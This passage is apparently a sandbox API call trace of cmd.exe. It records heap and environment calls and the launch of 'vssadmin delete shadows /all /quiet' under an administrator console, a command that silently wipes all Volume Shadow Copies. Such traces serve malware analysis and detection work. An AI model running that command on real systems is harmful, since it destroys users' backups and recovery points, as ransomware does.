(_String1="vssadmin", _String2="MKDIR") returned 9 [0057.123] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0057.124] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0057.124] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0057.124] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0057.124] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0057.124] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0057.124] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0057.124] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0057.124] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0057.124] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0057.124] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0057.124] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0057.124] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0057.124] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0057.124] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0057.124] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0057.124] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0057.124] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0057.124] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0057.124] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0057.124] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0057.124] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0057.124] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0057.124] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0057.124] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0057.124] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0057.124] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0057.124] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0057.125] GetProcessHeap () returned 0x3e0000 [0057.125] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3e1ab0 [0057.125] GetProcessHeap () returned 0x3e0000 [0057.125] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x5a) returned 0x3e1cd0 [0057.125] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0057.125] GetProcessHeap () returned 0x3e0000 [0057.125] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x420) returned 0x3f9a80 [0057.125] SetErrorMode (uMode=0x0) returned 0x1 [0057.125] SetErrorMode (uMode=0x1) returned 0x0 [0057.125] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f9a90, lpFilePart=0x2ced80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ced80*="Desktop") returned 0x25 [0057.125] SetErrorMode (uMode=0x1) returned 0x1 [0057.125] GetProcessHeap () returned 0x3e0000 [0057.126] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9a80, Size=0x6e) returned 0x3f9a80 [0057.126] GetProcessHeap () returned 0x3e0000 [0057.126] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9a80) returned 0x6e [0057.126] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.126] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0057.126] GetProcessHeap () returned 0x3e0000 [0057.126] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x128) returned 0x3f5b70 [0057.126] GetProcessHeap () returned 0x3e0000 [0057.126] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x240) returned 0x3f9b00 [0057.131] GetProcessHeap () returned 0x3e0000 [0057.131] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9b00, Size=0x12a) returned 0x3f9b00 [0057.131] GetProcessHeap () returned 0x3e0000 [0057.131] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9b00) returned 0x12a [0057.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.131] GetProcessHeap () returned 0x3e0000 [0057.131] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3f9c40 [0057.131] GetProcessHeap () returned 0x3e0000 [0057.131] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9c40, Size=0x7e) returned 0x3f9c40 [0057.131] GetProcessHeap () returned 0x3e0000 [0057.131] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9c40) returned 0x7e [0057.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.133] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0057.133] GetLastError () returned 0x2 [0057.133] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0057.133] GetLastError () returned 0x2 [0057.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3e1d40 [0057.133] GetProcessHeap () returned 0x3e0000 [0057.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x28) returned 0x3f4640 [0057.134] FindClose (in: hFindFile=0x3e1d40 | out: hFindFile=0x3e1d40) returned 1 [0057.134] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0057.134] GetLastError () returned 0x2 [0057.134] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3e1d40 [0057.134] GetProcessHeap () returned 0x3e0000 [0057.134] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4640, Size=0x8) returned 0x3f98f0 [0057.134] FindClose (in: hFindFile=0x3e1d40 | out: hFindFile=0x3e1d40) returned 1 [0057.134] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0057.134] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0057.134] GetConsoleTitleW (in: lpConsoleTitle=0x2cf040, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0057.134] GetProcessHeap () returned 0x3e0000 [0057.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x21c) returned 0x3f9cd0 [0057.134] GetConsoleTitleW (in: lpConsoleTitle=0x3f9ce0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0057.134] GetProcessHeap () returned 0x3e0000 [0057.134] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9cd0, Size=0xc0) returned 0x3f9cd0 [0057.135] GetProcessHeap () returned 0x3e0000 [0057.135] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9cd0) returned 0xc0 [0057.135] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0057.135] GetProcessHeap () returned 0x3e0000 [0057.135] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9cd0 | out: hHeap=0x3e0000) returned 1 [0057.135] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cedf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cedb8 | out: lpAttributeList=0x2cedf8, lpSize=0x2cedb8) returned 1 [0057.135] UpdateProcThreadAttribute (in: lpAttributeList=0x2cedf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ceda8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cedf8, lpPreviousValue=0x0) returned 1 [0057.135] GetStartupInfoW (in: lpStartupInfo=0x2cef10 | out: lpStartupInfo=0x2cef10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa4, hStdOutput=0x10c, hStdError=0x10c)) [0057.135] GetProcessHeap () returned 0x3e0000 [0057.135] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f4640 [0057.135] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.135] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.135] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.136] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.137] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.137] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.137] GetProcessHeap () returned 0x3e0000 [0057.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4640 | out: hHeap=0x3e0000) returned 1 [0057.137] GetProcessHeap () returned 0x3e0000 [0057.137] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f8900 [0057.137] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cee30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cede0 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x2cede0*(hProcess=0x54, hThread=0x50, dwProcessId=0x358, dwThreadId=0xc4)) returned 1 [0057.740] CloseHandle (hObject=0x50) returned 1 [0057.740] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0057.740] GetProcessHeap () returned 0x3e0000 [0057.740] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fc230 | out: hHeap=0x3e0000) returned 1 [0057.740] GetEnvironmentStringsW () returned 0x3faa10* [0057.740] GetProcessHeap () returned 0x3e0000 [0057.740] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae8) returned 0x3fb500 [0057.740] FreeEnvironmentStringsW (penv=0x3faa10) returned 1 [0057.740] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77a60000 [0057.741] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0057.741] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x2ce6e8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2ce6e8, ReturnLength=0x0) returned 0x0 [0057.741] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x2ce720, nSize=0x380, lpNumberOfBytesRead=0x2ce6e0 | out: lpBuffer=0x2ce720*, lpNumberOfBytesRead=0x2ce6e0*=0x380) returned 1 [0057.741] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0114.393] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ced28 | out: lpExitCode=0x2ced28*=0x0) returned 1 [0114.394] CloseHandle (hObject=0x54) returned 1 [0114.394] _vsnwprintf (in: _Buffer=0x2cef98, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced38 | out: _Buffer="00000000") returned 8 [0114.394] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0114.394] GetProcessHeap () returned 0x3e0000 [0114.394] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb500 | out: hHeap=0x3e0000) returned 1 [0114.394] GetEnvironmentStringsW () returned 0x3faa10* [0114.394] GetProcessHeap () returned 0x3e0000 [0114.395] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0114.395] FreeEnvironmentStringsW (penv=0x3faa10) returned 1 [0114.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0114.395] GetProcessHeap () returned 0x3e0000 [0114.395] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0114.395] GetEnvironmentStringsW () returned 0x3faa10* [0114.395] GetProcessHeap () returned 0x3e0000 [0114.395] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0114.395] FreeEnvironmentStringsW (penv=0x3faa10) returned 1 [0114.395] GetProcessHeap () returned 0x3e0000 [0114.395] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8900 | out: hHeap=0x3e0000) returned 1 [0114.395] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cedf8 | out: lpAttributeList=0x2cedf8) [0114.396] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0114.398] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.398] SetConsoleMode (hConsoleHandle=0x10c, dwMode=0x0) returned 0 [0114.398] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.398] GetConsoleMode (in: hConsoleHandle=0x10c, lpMode=0x49f5e194 | out: lpMode=0x49f5e194) returned 0 [0114.398] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.398] GetConsoleMode (in: hConsoleHandle=0xa4, lpMode=0x49f5e198 | out: lpMode=0x49f5e198) returned 0 [0114.398] GetConsoleOutputCP () returned 0x1b5 [0114.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0114.399] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.399] GetProcessHeap () returned 0x3e0000 [0114.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9c40 | out: hHeap=0x3e0000) returned 1 [0114.399] GetProcessHeap () returned 0x3e0000 [0114.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9b00 | out: hHeap=0x3e0000) returned 1 [0114.399] GetProcessHeap () returned 0x3e0000 [0114.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b70 | out: hHeap=0x3e0000) returned 1 [0114.399] GetProcessHeap () returned 0x3e0000 [0114.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9a80 | out: hHeap=0x3e0000) returned 1 [0114.399] GetProcessHeap () returned 0x3e0000 [0114.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1cd0 | out: hHeap=0x3e0000) returned 1 [0114.400] GetProcessHeap () returned 0x3e0000 [0114.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1ab0 | out: hHeap=0x3e0000) returned 1 [0114.400] GetProcessHeap () returned 0x3e0000 [0114.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f98a0 | out: hHeap=0x3e0000) returned 1 [0114.400] GetProcessHeap () returned 0x3e0000 [0114.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4610 | out: hHeap=0x3e0000) returned 1 [0114.400] GetProcessHeap () returned 0x3e0000 [0114.400] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f97e0 | out: hHeap=0x3e0000) returned 1 [0114.400] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf258 | out: _Buffer="\r\n") returned 2 [0114.400] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.400] GetFileType (hFile=0x10c) returned 0x3 [0114.400] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.400] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0114.400] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf228, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf228*=0x2, lpOverlapped=0x0) returned 1 [0114.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0114.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.401] _vsnwprintf (in: _Buffer=0x49f5eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf268 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0114.401] _vsnwprintf (in: _Buffer=0x49f5ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf268 | out: _Buffer=">") returned 1 [0114.401] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.401] GetFileType (hFile=0x10c) returned 0x3 [0114.401] _get_osfhandle (_FileHandle=1) returned 0x10c [0114.401] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0114.401] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf258, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf258*=0x26, lpOverlapped=0x0) returned 1 [0114.401] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.401] GetFileType (hFile=0xa4) returned 0x3 [0114.402] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.402] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.402] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.402] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e320, cchWideChar=1 | out: lpWideCharStr="wssadmin delete shadows /all /quiet\n") returned 1 [0114.402] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.402] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.402] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.402] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e322, cchWideChar=1 | out: lpWideCharStr="bsadmin delete shadows /all /quiet\n") returned 1 [0114.402] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.402] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.402] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.402] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e324, cchWideChar=1 | out: lpWideCharStr="aadmin delete shadows /all /quiet\n") returned 1 [0114.402] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.402] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.402] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.402] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e326, cchWideChar=1 | out: lpWideCharStr="ddmin delete shadows /all /quiet\n") returned 1 [0114.402] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.402] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.403] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e328, cchWideChar=1 | out: lpWideCharStr="mmin delete shadows /all /quiet\n") returned 1 [0114.403] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.403] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.403] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32a, cchWideChar=1 | out: lpWideCharStr="iin delete shadows /all /quiet\n") returned 1 [0114.403] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.403] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.403] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0114.403] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32c, cchWideChar=1 | out: lpWideCharStr="nn delete shadows /all /quiet\n") returned 1 [0114.403] _get_osfhandle (_FileHandle=0) returned 0xa4 [0114.403] SetFilePointer (in: hFile=0xa4, 